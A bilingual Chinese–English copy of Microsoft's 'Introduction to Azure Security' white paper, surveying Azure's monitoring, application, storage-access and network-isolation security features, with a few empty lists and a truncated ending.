Azure 安全性簡介Introduction to Azure Security

概觀Overview

我們知道安全性是雲端中的首要工作和其重要性,因為您可在其中找到精確且及時的 Azure 安全性資訊。We know that security is job one in the cloud and how important it is that you find accurate and timely information about Azure security. 針對您的應用程式和服務使用 Azure 的最佳原因之一是可以利用它的各種安全性工具和功能。One of the best reasons to use Azure for your applications and services is to take advantage of its wide array of security tools and capabilities. 這些工具和功能可協助您在安全的 Azure 平台上建立安全的解決方案。These tools and capabilities help make it possible to create secure solutions on the secure Azure platform. Microsoft Azure 提供客戶資料的機密性、完整性和可用性,同時也能釐清責任。Microsoft Azure provides confidentiality, integrity, and availability of customer data, while also enabling transparent accountability.

為了協助您從客戶和 Microsoft 作業的觀點深入了解如何在 Microsoft Azure 內實作一組安全性控制,因而編寫了本技術白皮書<Azure 安全性簡介>來提供可透過 Microsoft Azure 取得之安全性的完整介紹。To help you better understand the collection of security controls implemented within Microsoft Azure from both the customer's and Microsoft operations' perspectives, this white paper, "Introduction to Azure Security", is written to provide a comprehensive look at the security available with Microsoft Azure.

Azure 平台Azure Platform

Azure 是一個公用雲端服務平台,支援廣泛的作業系統、程式設計語言、架構、工具、資料庫及裝置等選擇。Azure is a public cloud service platform that supports a broad selection of operating systems, programming languages, frameworks, tools, databases, and devices. 它可以透過 Docker 整合執行 Linux 容器;使用 JavaScript、Python、.NET、PHP、Java 及 Node.js 建置應用程式;為 iOS、Android 及 Windows 裝置建置後端。It can run Linux containers with Docker integration; build apps with JavaScript, Python, .NET, PHP, Java, and Node.js; build back-ends for iOS, Android, and Windows devices.

Azure 公用雲端服務支援數百萬名開發人員和 IT 專家早已仰賴和信任的相同技術。Azure public cloud services support the same technologies millions of developers and IT professionals already rely on and trust. 當您建置 IT 資產或將其移轉至公用雲端服務提供者時,您正是依賴該組織的能力,利用他們提供來管理您雲端式資產安全性的服務與控制機制,來保護您的應用程式和資料。When you build on, or migrate IT assets to, a public cloud service provider you are relying on that organization’s abilities to protect your applications and data with the services and the controls they provide to manage the security of your cloud-based assets.

Azure 的基礎結構設計涵蓋設備與應用程式,可同時裝載數以百萬計的客戶,並提供值得信任的基礎以使企業可符合其安全性需求。Azure’s infrastructure is designed from facility to applications for hosting millions of customers simultaneously, and it provides a trustworthy foundation upon which businesses can meet their security requirements.

此外,Azure 也為您提供各式各樣可設定的安全性選項及控制它們的功能,讓您能夠自訂安全性以符合組織部署的特殊需求。In addition, Azure provides you with a wide array of configurable security options and the ability to control them so that you can customize security to meet the unique requirements of your organization’s deployments. 本文件有助於您了解 Azure 安全性功能如何協助您滿足這些需求。This document helps you understand how Azure security capabilities can help you fulfill these requirements.

注意

本文件的主要焦點是客戶面對的控制,您可以使用這些控制來自訂並提升應用程式和服務的安全性。The primary focus of this document is on customer-facing controls that you can use to customize and increase security for your applications and services.

我們會提供一些概觀資訊,但如需 Microsoft 如何保護 Azure 平台本身的詳細資訊,請參閱 Microsoft 信任中心 (英文) 中提供的資訊。We do provide some overview information, but for detailed information on how Microsoft secures the Azure platform itself, see information provided in the Microsoft Trust Center.

摘要Abstract

最初是基於節省成本與靈活運用創新而衍生出公用雲端移轉。Initially, public cloud migrations were driven by cost savings and agility to innovate. 經過一段時間之後,才將安全性視為公用雲端移轉的主要考量,甚至是個關鍵因素。Security was considered a major concern for some time, and even a show stopper, for public cloud migration. 不過,公用雲端安全性已從主要考量轉換為雲端移轉的驅策因素之一。However, public cloud security has transitioned from a major concern to one of the drivers for cloud migration. 這背後的原理是大型公用雲端服務提供者的卓越能力,可保護雲端式資產的應用程式和資料。The rationale behind this is the superior ability of large public cloud service providers to protect applications and the data of cloud-based assets.

Azure 的基礎結構設計涵蓋設備與應用程式,可同時裝載數以百萬計的客戶,並提供可靠的基礎供企業符合其安全性需求。Azure’s infrastructure is designed from the facility to applications for hosting millions of customers simultaneously, and it provides a trustworthy foundation upon which businesses can meet their security needs. 此外,Azure 也為您提供各式各樣可設定的安全性選項及控制它們的功能,讓您能夠自訂安全性來符合部署的特殊需求,以符合 IT 控制原則並遵循外部法規。In addition, Azure provides you with a wide array of configurable security options and the ability to control them so that you can customize security to meet the unique requirements of your deployments to meet your IT control policies and adhere to external regulations.

本白皮書概述 Microsoft 處理 Microsoft Azure 雲端平台安全性的方法:This paper outlines Microsoft’s approach to security within the Microsoft Azure cloud platform:

  • Microsoft 實作來保護 Azure 基礎結構、客戶資料和應用程式的安全性功能。Security features implemented by Microsoft to secure the Azure infrastructure, customer data, and applications.
  • Azure 服務和安全性功能,可讓您用來管理服務及 Azure 訂用帳戶中資料的安全性。Azure services and security features available to you to manage the Security of the Services and your data within your Azure subscriptions.

Azure 安全性功能摘要Summary Azure Security Capabilities

下表提供 Microsoft 實作來保護 Azure 基礎結構、客戶資料和安全應用程式之安全性功能的簡短描述。The table following provide a brief description of the security features implemented by Microsoft to secure the Azure infrastructure, customer data, and secure applications.

實作來保護 Azure 平台的安全性功能:Security Features Implemented to Secure the Azure Platform:

您可以檢閱下列功能,以保證會透過安全的方式來管理 Azure 平台。The features listed following are capabilities you can review to provide the assurance that the Azure Platform is managed in a secure manner. 以下提供進一步向下切入的連結,以了解 Microsoft 如何解決四個方面的客戶信任問題:安全平台、隱私權與控制權、合規性及透明度。Links have been provided for further drill-down on how Microsoft addresses customer trust questions in four areas: Secure Platform, Privacy & Controls, Compliance, and Transparency.

安全的平台Secure Platform 隱私權與控制Privacy & Controls 合規性Compliance 透明度Transparency
安全性開發週期 (英文)、內建稽核Security Development Cycle, Internal audits 隨時管理您的資料 (英文)Manage your data all the time 信任中心Trust Center Microsoft 如何保護 Azure 服務中的客戶資料 (英文)How Microsoft secures customer data in Azure services
必要的安全性訓練、背景檢查Mandatory Security training, background checks 資料位置控制 (英文)Control on data location Common Controls Hub (英文)Common Controls Hub Microsoft 如何管理 Azure 服務中的資料位置 (英文)How Microsoft manage data location in Azure services
滲透測試 (英文)入侵偵測、DDoS (英文)稽核和記錄(英文)Penetration testing, intrusion detection, DDoS, Audits & logging 根據您的條款提供資料存取 (英文)Provide data access on your terms 雲端服務審查評鑑檢查表 (英文)The Cloud Services Due Diligence Checklist Microsoft 內部的哪些人員可根據哪些條款存取您的資料 (英文)Who in Microsoft can access your data on what terms
技術資料中心的狀態 、實體安全性、安全網路State of the art data center, physical security, Secure Network 回應執法機關 (英文)Responding to law enforcement 依服務、位置和產業的合規性 (英文)Compliance by service, location & Industry Microsoft 如何保護 Azure 服務中的客戶資料 (英文)How Microsoft secures customer data in Azure services
安全性事件回應 (英文)共同責任 (英文)Security Incident response, Shared Responsibility 嚴格的隱私權標準 (英文)Stringent privacy standards 檢閱 Azure 服務的憑證、透明度中樞 (英文)Review certification for Azure services, Transparency hub

Azure 提供來保護資料和應用程式的安全性功能Security Features Offered by Azure to Secure Data and Application

負責管理應用程式或服務安全性之人員應負的責任會根據雲端服務模型而不同。Depending on the cloud service model, there is variable responsibility for who is responsible for managing the security of the application or service. Azure 平台中提供一些功能,可協助您透過內建功能,以及透過可部署到 Azure 訂用帳戶的協力廠商解決方案,來達成這些職責。There are capabilities available in the Azure Platform to assist you in meeting these responsibilities through built-in features, and through partner solutions that can be deployed into an Azure subscription.

內建功能分為六 (6) 個方面的功能:作業、應用程式、儲存體、網路、計算及身分識別。The built-in capabilities are organized in six (6) functional areas: Operations, Applications, Storage, Networking, Compute, and Identity. 在這六 (6) 個領域中,適用於 Azure 平台之特性與功能的其他詳細資料,會透過摘要資訊來提供。Additional detail on the features and capabilities available in the Azure Platform in these six (6) areas are provided through summary information.

作業Operations

本節提供關於安全性作業中主要功能的其他資訊,以及這些功能的摘要資訊。This section provides additional information regarding key features in security operations and summary information about these capabilities.

安全性和稽核儀表板Security and Audit Dashboard

安全性和稽核解決方案針對值得您注意的問題,使用內建的搜尋查詢,為您組織的 IT 安全性狀況提供全面性檢視。The Security and Audit solution provides a comprehensive view into your organization’s IT security posture with built-in search queries for notable issues that require your attention. 安全性和稽核儀表板是主畫面,如需所有項目相關的 Azure 監視器記錄檔中的安全性。The Security and Audit dashboard is the home screen for everything related to security in Azure Monitor logs. 它可讓您深入了解電腦的安全性狀態。It provides high-level insight into the Security state of your computers. 它還能夠檢視過去 24 小時、7 天或任何其他自訂時間範圍內的所有事件。It also includes the ability to view all events from the past 24 hours, 7 days, or any other custom time frame.

此外,您還能設定安全性與合規性,以便在偵測到特定事件時自動執行特定動作In addition, you can configure Security & Compliance to automatically carry out specific actions when a specific event is detected.

Azure Resource ManagerAzure Resource Manager

Azure Resource Manager 可讓您將方案中的資源做為群組使用。Azure Resource Manager enables you to work with the resources in your solution as a group. 您可以透過單一、協調的作業來部署、更新或刪除方案的所有資源。You can deploy, update, or delete all the resources for your solution in a single, coordinated operation. 您會使用 Azure Resource Manager 範本 (英文) 部署,該範本可用於不同的環境,例如測試、預備和生產環境。You use an Azure Resource Manager template for deployment and that template can work for different environments such as testing, staging, and production. Resource Manager 會提供安全性、稽核和標記功能,以協助您在部署後管理您的資源。Resource Manager provides security, auditing, and tagging features to help you manage your resources after deployment.

以 Azure Resource Manager 範本為基礎的部署,有助於提升部署於 Azure 中之解決方案的安全性 (因為標準的安全性控制設定),並且可整合至以標準化範本為基礎的部署中。Azure Resource Manager template-based deployments help improve the security of solutions deployed in Azure because standard security control settings and can be integrated into standardized template-based deployments. 這會降低可能需要在手動部署期間執行的安全性設定錯誤風險。This reduces the risk of security configuration errors that might take place during manual deployments.

Application InsightsApplication Insights

Application Insights 是適用於 Web 開發人員的可延伸「應用程式效能管理」(APM) 服務。Application Insights is an extensible Application Performance Management (APM) service for web developers. 使用 Application Insights,您可以即時監視 Web 應用程式,並自動偵測效能異常。With Application Insights, you can monitor your live web applications and automatically detect performance anomalies. 其中包括強大的分析工具可協助您診斷問題,並了解使用者實際如何運用您的應用程式。It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your apps. 它會在您的應用程式執行時全程加以監視,包括測試期間,以及您加以發佈或部署之後。It monitors your application all the time it's running, both during testing and after you've published or deployed it.

Application Insights 會建立圖表和資料表為您顯示多種資訊,例如,您在一天中的哪些時間有最多使用者、應用程式的回應性如何,以及它所依存的任何外部服務是否順暢地為其提供服務。Application Insights creates charts and tables that show you, for example, what times of day you get most users, how responsive the app is, and how well it is served by any external services that it depends on.

如果有當機、失敗或效能問題,您可以搜尋詳細的遙測資料,以診斷原因。If there are crashes, failures or performance issues, you can search through the telemetry data in detail to diagnose the cause. 此外,如果應用程式的可用性和效能有任何變更,服務會傳送電子郵件給您。And the service sends you emails if there are any changes in the availability and performance of your app. Application Insight 因而成為一個非常實用的安全性工具,因為它有助於提供機密性、完整性和可用性安全性三部曲中的「可用性」。Application Insight thus becomes a valuable security tool because it helps with the availability in the confidentiality, integrity, and availability security triad.

Azure 監視器Azure Monitor

Azure 監視器針對來自 Azure 基礎結構 (活動記錄) 及每個個別的 Azure 資源 (診斷記錄) 的資料,提供視覺效果、查詢、路由、警示、自動調整及自動化功能。Azure Monitor offers visualization, query, routing, alerting, auto scale, and automation on data both from the Azure infrastructure (Activity Log) and each individual Azure resource (Diagnostic Logs). 您可以使用 Azure 監視器,在 Azure 記錄中產生安全性相關事件時接收警示通知。You can use Azure Monitor to alert you on security-related events that are generated in Azure logs.

Azure 監視器記錄Azure Monitor logs

Azure 監視器記錄– 內部部署和協力廠商雲端式基礎結構 (如 AWS) Azure 資源之外,提供 IT 管理解決方案。Azure Monitor logs – Provides an IT management solution for both on-premises and third-party cloud-based infrastructure (such as AWS) in addition to Azure resources. Azure 監視器中的資料可以直接路由至 Azure 監視器記錄檔以便您可以看到在同一個地方您整個環境計量和記錄。Data from Azure Monitor can be routed directly to Azure Monitor logs so you can see metrics and logs for your entire environment in one place.

Azure 監視器記錄檔可以是一個有用的工具,在鑑識和其他安全性分析工具可讓您快速搜尋大量的安全性相關的項目與彈性查詢方法。Azure Monitor logs can be a useful tool in forensic and other security analysis, as the tool enables you to quickly search through large amounts of security-related entries with a flexible query approach. 此外,在內部可以匯出到 Azure 防火牆和 proxy 記錄檔,並且可供分析使用 Azure 監視器記錄檔。In addition, on-premises firewall and proxy logs can be exported into Azure and made available for analysis using Azure Monitor logs.

Azure 建議程式Azure Advisor

Azure Advisor 是個人化雲端顧問,可協助您將 Azure 部署最佳化。Azure Advisor is a personalized cloud consultant that helps you to optimize your Azure deployments. 它會分析您的資源及用量遙測,It analyzes your resource configuration and usage telemetry. 接著會建議解決方案,以協助改善資源的效能安全性高可用性,同時尋找降低整體 Azure 費用的機會。It then recommends solutions to help improve the performance, security, and high availability of your resources while looking for opportunities to reduce your overall Azure spend. Azure Advisor 提供安全性建議,讓您能夠大幅改善您部署於 Azure 中之解決方案的整體安全性狀態。Azure Advisor provides security recommendations, which can significantly improve your overall security posture for solutions you deploy in Azure. 這些建議均取自 Azure 資訊安全中心所執行的安全性分析。These recommendations are drawn from security analysis performed by Azure Security Center.

Azure 資訊安全中心Azure Security Center

Azure 資訊安全中心利用加強對您 Azure 資源的能見度及安全性控制權,來協助您預防、偵測及回應威脅。Azure Security Center helps you prevent, detect, and respond to threats with increased visibility into and control over the security of your Azure resources. 它提供您 Azure 訂用帳戶之間的整合式安全性監視和原則管理,協助您偵測可能會忽略的威脅,且適用於廣泛的安全性解決方案生態系統。It provides integrated security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions.

此外,Azure 資訊安全中心可協助進行安全性作業,方法是提供單一儀表板來顯示可立即採取行動的警示和建議。In addition, Azure Security Center helps with security operations by providing you a single dashboard that surfaces alerts and recommendations that can be acted upon immediately. 通常,您可以在 Azure 資訊安全中心主控台內透過按一下的方式來補救問題。Often, you can remediate issues with a single click within the Azure Security Center console.

[應用程式]Applications

本節提供關於應用程式安全性中主要功能的其他資訊,以及這些功能的摘要資訊。The section provides additional information regarding key features in application security and summary information about these capabilities.

Web 應用程式弱點掃描Web Application vulnerability scanning

開始測試您 App Service 應用程式上是否有弱點的最簡單方式之一是使用與 Tinfoil Security 的整合 (英文),以在您的應用程式上執行單鍵弱點掃描。One of the easiest ways to get started with testing for vulnerabilities on your App Service app is to use the integration with Tinfoil Security to perform one-click vulnerability scanning on your app. 您可以在容易了解的報告中檢視測試結果,並且了解如何以逐步指示修正每個弱點。You can view the test results in an easy-to-understand report, and learn how to fix each vulnerability with step-by-step instructions.

滲透測試Penetration Testing

如果您想要執行專屬的滲透測試,或想要使用另一個掃描器套件或提供者,您必須依照 Azure 滲透測試核准程序 並取得先前核准,才能執行所需的滲透測試。If you prefer to perform your own penetration tests or want to use another scanner suite or provider, you must follow the Azure penetration testing approval process and obtain prior approval to perform the desired penetration tests.

Web 應用程式防火牆Web Application firewall

Azure 應用程式閘道中的 Web 應用程式防火牆 (WAF) 可協助保護 Web 應用程式,以免於常見的 Web 型攻擊,例如 SQL 插入式攻擊、跨網站指令碼攻擊和工作階段攔截。The web application firewall (WAF) in Azure Application Gateway helps protect web applications from common web-based attacks like SQL injection, cross-site scripting attacks, and session hijacking. 其已預先設定 Open Web Application Security Project (OWASP) 認定為前 10 大常見漏洞的威脅防護。It comes preconfigured with protection from threats identified by the Open Web Application Security Project (OWASP) as the top 10 common vulnerabilities.

Azure App Service 中的驗證與授權Authentication and authorization in Azure App Service

App Service 驗證/授權是可讓應用程式接受使用者登入的一種功能,而不需要您在應用程式後端變更程式碼。App Service Authentication / Authorization is a feature that provides a way for your application to sign in users so that you don't have to change code on the app backend. 它提供簡單的方法來保護您的應用程式,以及使用每位使用者的資料。It provides an easy way to protect your application and work with per-user data.

分層式安全性架構Layered Security Architecture

由於 App Service 環境提供部署至 Azure 虛擬網路的隔離執行階段環境,因此開發人員能夠建立分層式安全性架構,針對每個應用程式層提供不同層級的網路存取。Since App Service Environments provide an isolated runtime environment deployed into an Azure Virtual Network, developers can create a layered security architecture providing differing levels of network access for each application tier. 常見的需求之一,是要隱藏對 API 後端的一般網際網路存取,而只允許由上游 Web 應用程式呼叫 API。A common desire is to hide API back-ends from general Internet access, and only allow APIs to be called by upstream web apps. 網路安全性群組 (NSG) 可用於包含 App Service 環境的 Azure 虛擬網路子網路,以限制對 API 應用程式的公用存取。Network Security groups (NSGs) can be used on Azure Virtual Network subnets containing App Service Environments to restrict public access to API applications.

Web 伺服器診斷和應用程式診斷Web server diagnostics and application diagnostics

App Service Web 應用程式會針對來自 Web 伺服器和 Web 應用程式的記錄資訊提供診斷功能。App Service web apps provide diagnostic functionality for logging information from both the web server and the web application. 這些資訊邏輯上可區分為 Web 伺服器診斷應用程式診斷These are logically separated into web server diagnostics and application diagnostics. Web 伺服器在針對網站和應用程式進行診斷及疑難排解方面包含了兩個重大進展。Web server includes two major advances in diagnosing and troubleshooting sites and applications.

第一個新功能是關於應用程式集區、背景工作處理序、網站、應用程式定義域和執行中要求的即時狀態資訊。The first new feature is real-time state information about application pools, worker processes, sites, application domains, and running requests. 第二個新優點是詳細的追蹤事件,可在整個完成要求與回應程序中追蹤要求。The second new advantages are the detailed trace events that track a request throughout the complete request-and-response process.

若要能夠收集這些追蹤事件,您可以設定 IIS 7,針對任何以經過時間或錯誤回應碼為基礎的特定要求,自動擷取完整的追蹤記錄 (XML 格式)。To enable the collection of these trace events, IIS 7 can be configured to automatically capture full trace logs, in XML format, for any particular request based on elapsed time or error response codes.

Web 伺服器診斷Web server diagnostics

您可以啟用或停用下列各種記錄:You can enable or disable the following kinds of logs:

  • 詳細的錯誤記錄:對於表示失敗的 HTTP 狀態碼 (狀態碼 400 或更大) 的詳細錯誤資訊。Detailed Error Logging - Detailed error information for HTTP status codes that indicate a failure (status code 400 or greater). 這當中包含的資訊可協助您判斷為何伺服器傳回錯誤碼。This may contain information that can help determine why the server returned the error code.

  • 失敗要求的追蹤:關於失敗要求的詳細資訊,包括追蹤用來處理要求的 IIS 元件及每個元件所花費的時間。Failed Request Tracing - Detailed information on failed requests, including a trace of the IIS components used to process the request and the time taken in each component. 如果您嘗試提升網站效能或是想要從傳回的特定 HTTP 錯誤中找到發生原因,這個方法非常實用。This can be useful if you are attempting to increase site performance or isolate what is causing a specific HTTP error to be returned.

  • Web 伺服器記錄:使用 W3C 擴充記錄檔格式的 HTTP 交易相關資訊。Web Server Logging - Information about HTTP transactions using the W3C extended log file format. 當您需要判斷整體網站指標 (例如,處理的要求數量,或者有多少要求來自特定的 IP 位址) 時,這非常實用。This is useful when determining overall site metrics such as the number of requests handled or how many requests are from a specific IP address.

應用程式診斷Application diagnostics

應用程式診斷可讓您擷取 Web 應用程式所產生的資訊。Application diagnostics allows you to capture information produced by a web application. ASP.NET 應用程式會使用 System.Diagnostics.Trace 類別將資訊記錄到應用程式診斷記錄。ASP.NET applications can use the System.Diagnostics.Trace class to log information to the application diagnostics log. 在應用程式診斷中,有兩種主要的事件類型:與應用程式效能相關的類型,以及與應用程式失敗和錯誤相關的類型。In Application Diagnostics, there are two major types of events, those related to application performance and those related to application failures and errors. 失敗和錯誤可進一步細分為連線、安全性和失敗問題。The failures and errors can be divided further into connectivity, security, and failure issues. 失敗問題通常與應用程式程式碼的問題有關。Failure issues are typically related to a problem with the application code.

在應用程式診斷中,您可以檢視以下列方式分組的事件:In Application Diagnostics, you can view events grouped in these ways:

  • 全部 (顯示所有事件)All (displays all events)
  • 應用程式錯誤 (顯示例外狀況事件)Application Errors (displays exception events)
  • 效能 (顯示效能事件)Performance (displays performance events)

儲存體Storage

本節提供關於 Azure 儲存體安全性中主要功能的其他資訊,以及這些功能的摘要資訊。The section provides additional information regarding key features in Azure storage security and summary information about these capabilities.

角色型存取控制 (RBAC)Role-Based Access Control (RBAC)

您可以使用角色型存取控制 (RBAC) 來保護儲存體帳戶。You can secure your storage account with Role-Based Access Control (RBAC). 對於想要強制執行資料存取安全性原則的組織,根據需要知道 (英文)最低權限 (英文) 安全性主體限制存取權限是必須做的事。Restricting access based on the need to know and least privilege security principles is imperative for organizations that want to enforce Security policies for data access. 在特定範圍將適當的 RBAC 角色指派給群組和應用程式,即可授與這些存取權限。These access rights are granted by assigning the appropriate RBAC role to groups and applications at a certain scope. 您可以使用 內建的 RBAC 角色(例如儲存體帳戶參與者) 將權限指派給使用者。You can use built-in RBAC roles, such as Storage Account Contributor, to assign privileges to users. 使用 Azure Resource Manager 模型來存取儲存體帳戶的儲存體金鑰,可以透過角色型存取控制 (RBAC) 來控制。Access to the storage keys for a storage account using the Azure Resource Manager model can be controlled through Role-Based Access Control (RBAC).

共用存取簽章Shared Access Signature

共用存取簽章 (SAS) 可提供您儲存體帳戶中資源的委派存取。A shared access signature (SAS) provides delegated access to resources in your storage account. SAS 意謂著您可以將儲存體帳戶中物件的有限權限授與用戶端,讓該用戶端可以在一段指定期間內使用一組指定的權限進行存取。The SAS means that you can grant a client limited permissions to objects in your storage account for a specified period and with a specified set of permissions. 您可以在不須分享您帳戶存取金鑰的情況下,授與這些有限的權限。You can grant these limited permissions without having to share your account access keys.

傳輸中加密Encryption in Transit

傳輸中加密是透過網路傳輸資料時用來保護資料的機制。Encryption in transit is a mechanism of protecting data when it is transmitted across networks. 透過 Azure 儲存體,您可以使用下列各項來保護資料:With Azure Storage, you can secure data using:

待用加密Encryption at rest

對許多組織來說,待用資料加密是達到資料隱私權、合規性及資料主權的必要步驟。For many organizations, data encryption at rest is a mandatory step towards data privacy, compliance, and data sovereignty. 有三個 Azure 儲存體安全性功能可提供「待用」資料的加密:There are three Azure storage security features that provide encryption of data that is “at rest”:

存储分析Storage Analytics

Azure 儲存體分析會執行記錄,並提供儲存體帳戶的計量資料。Azure Storage Analytics performs logging and provides metrics data for a storage account. 您可以使用此資料來追蹤要求、分析使用量趨勢,以及診斷儲存體帳戶的問題。You can use this data to trace requests, analyze usage trends, and diagnose issues with your storage account. 儲存體分析會記錄對儲存體服務之成功和失敗要求的詳細資訊。Storage Analytics logs detailed information about successful and failed requests to a storage service. 這項資訊可用來監視個別要求,並診斷儲存體服務的問題。This information can be used to monitor individual requests and to diagnose issues with a storage service. 系統會以最佳方式來記錄要求。Requests are logged on a best-effort basis. 系統將記錄下列類型的驗證要求:The following types of authenticated requests are logged:

  • 成功的要求。Successful requests.

  • 失敗的要求,包括逾時、節流、網路、授權和其他錯誤。Failed requests, including timeout, throttling, network, authorization, and other errors.

  • 使用共用存取簽章 (SAS) 的要求,包括失敗和成功的要求。Requests using a Shared Access Signature (SAS), including failed and successful requests.

  • 分析資料的要求。Requests to analytics data.

使用 CORS 啟用瀏覽器型用戶端Enabling Browser-Based Clients Using CORS

跨原始來源資源共用 (CORS) 這個機制可讓網域能夠為彼此提供權限來存取彼此的資源。Cross-Origin Resource Sharing (CORS) is a mechanism that allows domains to give each other permission for accessing each other’s resources. 使用者代理程式會傳送額外的標頭,以確保允許從特定網域載入的 JavaScript 程式碼存取位於另一個網域的資源。The User Agent sends extra headers to ensure that the JavaScript code loaded from a certain domain is allowed to access resources located at another domain. 第二個網域接著會利用額外的標頭回覆,以允許或拒絕對其資源的原始網域存取。The latter domain then replies with extra headers allowing or denying the original domain access to its resources.

Azure 儲存體服務目前支援 CORS,因此,一旦您設定服務的 CORS 規則之後,即會評估從不同網域對服務所提出的適當驗證要求,以判斷是否可根據您指定的規則來允許它。Azure storage services now support CORS so that once you set the CORS rules for the service, a properly authenticated request made against the service from a different domain is evaluated to determine whether it is allowed according to the rules you have specified.

網路功能Networking

本節提供關於 Azure 網路安全性中主要功能的其他資訊,以及這些功能的摘要資訊。The section provides additional information regarding key features in Azure network security and summary information about these capabilities.

網路層控制Network Layer Controls

網路存取控制是指限制與特定裝置或子網路間之連線的動作,並代表網路安全性的核心。Network access control is the act of limiting connectivity to and from specific devices or subnets and represents the core of network security. 網路存取控制的目的是確定只有您想要它們存取的使用者和裝置,才能存取您的虛擬機器和服務。The goal of network access control is to make sure that your virtual machines and services are accessible to only users and devices to which you want them accessible.

網路安全性群組Network Security Groups

網路安全性群組 (NSG) 是基本可設定狀態封包過濾防火牆,並可讓您根據 5 個 Tuple (英文) 來控制存取權。A Network Security Group (NSG) is a basic stateful packet filtering firewall and it enables you to control access based on a 5-tuple. NSG 未提供應用程式層級檢查或已驗證的存取控制。NSGs do not provide application layer inspection or authenticated access controls. 它們可用來控制在 Azure 虛擬網路內子網路之間移動的流量,以及在 Azure 虛擬網路與網際網路之間的流量。They can be used to control traffic moving between subnets within an Azure Virtual Network and traffic between an Azure Virtual Network and the Internet.

路由控制和強制通道Route Control and Forced Tunneling

控制您 Azure 虛擬網路上路由行為的能力是重大網路安全性和存取控制功能。The ability to control routing behavior on your Azure Virtual Networks is a critical network security and access control capability. 例如,如果您想要確定進出 Azure 虛擬網路的所有流量都會經過該虛擬安全性設備,您需要能夠控制和自訂路由行為。For example, if you want to make sure that all traffic to and from your Azure Virtual Network goes through that virtual security appliance, you need to be able to control and customize routing behavior. 做法是在 Azure 中設定使用者定義的路由。You can do this by configuring User-Defined Routes in Azure.

使用者定義的路由可讓您自訂移入和移出個別虛擬機器或子網路之流量的連入和連出路徑,盡可能確保最安全的路由。User-Defined Routes allow you to customize inbound and outbound paths for traffic moving into and out of individual virtual machines or subnets to insure the most secure route possible. 強制通道處理這個機制可用來確保不允許您的服務起始與網際網路上裝置的連線。Forced tunneling is a mechanism you can use to ensure that your services are not allowed to initiate a connection to devices on the Internet.

這與能夠接受連入連線,然後回應它們不同。This is different from being able to accept incoming connections and then responding to them. 前端 Web 伺服器需要回應來自網際網路主機的要求,因此允許來自網際網路的流量傳入到這些 Web 伺服器,而 Web 伺服器可以回應。Front-end web servers need to respond to requests from Internet hosts, and so Internet-sourced traffic is allowed inbound to these web servers and the web servers can respond.

強制通道處理通常用來強制傳至網際網路的連出流量通過內部部署安全性 Proxy 和防火牆。Forced tunneling is commonly used to force outbound traffic to the Internet to go through on-premises security proxies and firewalls.

虛擬網路安全性應用裝置Virtual Network Security Appliances

雖然網路安全性群組、使用者定義路由和強制通道處理提供 OSI 模型 (英文) 之網路和傳輸層的安全性層級,但是您有時可能想要啟用較高堆疊層級的安全性。While Network Security Groups, User-Defined Routes, and forced tunneling provide you a level of security at the network and transport layers of the OSI model, there may be times when you want to enable security at higher levels of the stack. 您可以使用 Azure 合作夥伴網路安全性設備解決方案,來存取這些增強的網路安全性功能。You can access these enhanced network security features by using an Azure partner network security appliance solution. 您可以瀏覽 Azure Marketplace 並搜尋「安全性」和「網路安全性」,以尋找最新的 Azure 合作夥伴網路安全性解決方案。You can find the most current Azure partner network security solutions by visiting the Azure Marketplace and searching for “security” and “network security.”

Azure 虛擬網路Azure Virtual Network

Azure 虛擬網路 (VNet) 是您的網路在雲端中的身分。An Azure virtual network (VNet) is a representation of your own network in the cloud. 它是專屬於您訂用帳戶的 Azure 網路網狀架構邏輯隔離。It is a logical isolation of the Azure network fabric dedicated to your subscription. 您可以完全控制此網路內的 IP 位址區塊、DNS 設定、安全性原則和路由表。You can fully control the IP address blocks, DNS settings, security policies, and route tables within this network. 您可以將 VNet 分成數個子網路,並在 Azure 虛擬網路上放置 Azure IaaS 虛擬機器 (VM) 和/或雲端服務 (PaaS 角色執行個體)You can segment your VNet into subnets and place Azure IaaS virtual machines (VMs) and/or Cloud services (PaaS role instances) on Azure Virtual Networks.

另外,您也可以使用 Azure 中提供的其中一個連線選項將虛擬網路連線到內部部署網路。Additionally, you can connect the virtual network to your on-premises network using one of the connectivity options available in Azure. 基本上,您可以將您的網路延伸至 Azure,透過 Azure 提供的企業級好處完整控制 IP 位址區塊。In essence, you can expand your network to Azure, with complete control on IP address blocks with the benefit of enterprise scale Azure provides.

Azure 網路功能支援各種安全遠端存取案例。Azure networking supports various secure remote access scenarios. 其中包含:Some of these include:

VPN 閘道VPN Gateway

若要在 Azure 虛擬網路和您的內部部署網站之間傳送網路流量,就必須為 Azure 虛擬網路建立 VPN 閘道。To send network traffic between your Azure Virtual Network and your on-premises site, you must create a VPN gateway for your Azure Virtual Network. VPN 閘道是一種虛擬網路閘道,可透過公用連接傳送加密的流量。A VPN gateway is a type of virtual network gateway that sends encrypted traffic across a public connection. 您也可以使用 VPN 閘道,透過 Azure 網路網狀架構傳送 Azure 虛擬網路之間的流量。You can also use VPN gateways to send traffic between Azure Virtual Networks over the Azure network fabric.

ExpressRouteExpress Route

Microsoft Azure ExpressRoute 是專用的 WAN 連結,可讓您透過連線提供者所提供的專用私人連接,將內部部署網路擴充至 Microsoft 雲端。Microsoft Azure ExpressRoute is a dedicated WAN link that lets you extend your on-premises networks into the Microsoft cloud over a dedicated private connection facilitated by a connectivity provider.

ExpressRoute

透過 ExpressRoute,您可以建立 Microsoft 雲端服務的連線,例如 Microsoft Azure、Office 365 和 CRM Online。With ExpressRoute, you can establish connections to Microsoft cloud services, such as Microsoft Azure, Office 365, and CRM Online. 從任意點對任意點 (IP VPN) 網路、點對點乙太網路,或在共置設施上透過連線提供者的虛擬交叉連接,都可以進行連線。Connectivity can be from an any-to-any (IP VPN) network, a point-to-point Ethernet network, or a virtual cross-connection through a connectivity provider at a co-location facility.

ExpressRoute 連接不會經過公用網際網路,因此可視為比 VPN 型解決方案更安全。ExpressRoute connections do not go over the public Internet and thus can be considered more secure than VPN-based solutions. 相較於一般網際網路連線,這可讓 ExpressRoute 連線提供更可靠、更快速、延遲更短和更安全的連線。This allows ExpressRoute connections to offer more reliability, faster speeds, lower latencies, and higher security than typical connections over the Internet.

应用程序网关Application Gateway

Microsoft Azure 應用程式閘道會以服務形式提供應用程式傳遞控制器 (ADC) (英文),為您的應用程式提供各種第 7 層負載平衡功能。Microsoft Azure Application Gateway provides an Application Delivery Controller (ADC) as a service, offering various layer 7 load balancing capabilities for your application.

应用程序网关

